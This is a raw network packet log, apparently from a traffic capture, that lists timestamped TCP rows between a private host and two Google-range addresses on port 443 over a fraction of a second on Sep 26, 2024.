Sep 26, 2024 17:55:28.694820881 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.694842100 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.694875956 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.694881916 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.694906950 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.694962978 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.694971085 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.695811987 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.695869923 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.695878029 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.697212934 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.697264910 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.697273016 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.699290037 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.699347973 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.699354887 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.701118946 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.701173067 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.701179028 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.702286959 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.702353001 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.702358961 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.702532053 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.702564001 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.702578068 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.702595949 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.702632904 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.702636003 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.702644110 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.702676058 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.702682018 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.703634977 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.703685045 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.703691959 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.704824924 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.704884052 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.704891920 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.706243038 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.706298113 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.706305027 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.707516909 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.707581997 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.707587004 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.709189892 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.709261894 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.709268093 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.710575104 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.710643053 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.710649014 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.711582899 CEST	443	49749	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.711637020 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.711694002 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.711719036 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.712102890 CEST	443	49749	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.712169886 CEST	49749	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.712296009 CEST	49749	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.712312937 CEST	443	49749	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.712321997 CEST	49749	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.712358952 CEST	49749	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.713013887 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.713064909 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.713077068 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.713099003 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.713140965 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.713151932 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.713159084 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.713188887 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.713202953 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.713242054 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.713249922 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.714343071 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.714405060 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.714411974 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.714612961 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.714874029 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.714880943 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.715337038 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.715604067 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.715634108 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.715655088 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.715662003 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.715722084 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.715918064 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.717076063 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.717158079 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.717384100 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.717391014 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.717437983 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.718182087 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.719779968 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.719841003 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.719846964 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.721993923 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.722053051 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.722059011 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.722167015 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.722213984 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.722220898 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.723680973 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.723741055 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.723768950 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.723789930 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.723798990 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.723809958 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.723834991 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.723865986 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.723910093 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.723922968 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.726494074 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.726548910 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.726555109 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.726733923 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.726783037 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.726788998 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.726872921 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.726919889 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.726926088 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.732084990 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.732120037 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.732150078 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.732176065 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.732178926 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.732199907 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.732228041 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.732266903 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.732302904 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.732352972 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.732388020 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.732397079 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.732489109 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.732533932 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.732538939 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.732964993 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.733021021 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.733047009 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.733144045 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.733194113 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.733201981 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.733328104 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.733376026 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.733382940 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.739543915 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.739609957 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.739620924 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.739756107 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.739855051 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.739861965 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.739890099 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.739934921 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.739950895 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.739967108 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.739989042 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.739996910 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.740042925 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.740072012 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.740083933 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.740091085 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.740127087 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.740205050 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.740257025 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.740283966 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.740294933 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.740302086 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.740339041 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.740345955 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.740396976 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.740438938 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.740444899 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.746731997 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.746800900 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.746814013 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.746936083 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.746979952 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.746985912 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.747064114 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.747109890 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.747116089 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.752321005 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.752362013 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.752397060 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.752401114 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.752413988 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.752437115 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.752471924 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.752502918 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.752513885 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.752527952 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.752559900 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.752620935 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.752657890 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.752675056 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.752693892 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.752696037 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.752703905 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.752712011 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.752732038 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.752738953 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.752748966 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.752756119 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.752762079 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.752827883 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.752942085 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.752964973 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.752968073 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.752974033 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.753010035 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.759417057 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.759427071 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.759577990 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.759605885 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.759639025 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.759646893 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.759686947 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.759723902 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.763170958 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.763241053 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.763257980 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.763266087 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.763304949 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.763322115 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.763400078 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.763438940 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.763446093 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.765543938 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.765609026 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.765609026 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.765634060 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.765675068 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.765675068 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.765695095 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.765733957 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.765742064 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.765783072 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.765814066 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.765825033 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.765831947 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.765866995 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.765901089 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.765957117 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.765994072 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.765997887 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.766006947 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.766038895 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.766875982 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.767025948 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.767060041 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.767066002 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.767074108 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.767107964 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.767112970 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.771508932 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.771550894 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.771575928 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.771584034 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.771620035 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.771625996 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.771671057 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.771713018 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.771718979 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.771897078 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.771939993 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.771945000 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.771955013 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.771998882 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.772002935 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.772010088 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.772056103 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.772062063 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.775871992 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.775929928 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.775935888 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.775973082 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.775996923 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.776010990 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.776016951 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.776052952 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.776062965 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.778640032 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.778686047 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.778701067 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.778722048 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.778765917 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.778769016 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.778779984 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.778819084 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.778825998 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.778868914 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.778906107 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.778918028 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.778960943 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.778997898 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.779000044 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.779010057 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.779048920 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.779057026 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.780978918 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.781016111 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.781038046 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.781044960 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.781090021 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.781090975 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.781102896 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.781152010 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.781158924 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.783169031 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.783196926 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.783221960 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.783233881 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.783262014 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.783274889 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.783282042 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.783320904 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.783325911 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.786027908 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.786067009 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.786087036 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.786093950 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.786130905 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.786132097 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.786144972 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.786187887 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.786194086 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.790400028 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.790441990 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.790477037 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.790508032 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.790534019 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.790538073 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.790549994 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.790585995 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.791131973 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.791167974 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.791189909 CEST	49736	443	192.168.2.16	142.250.186.132
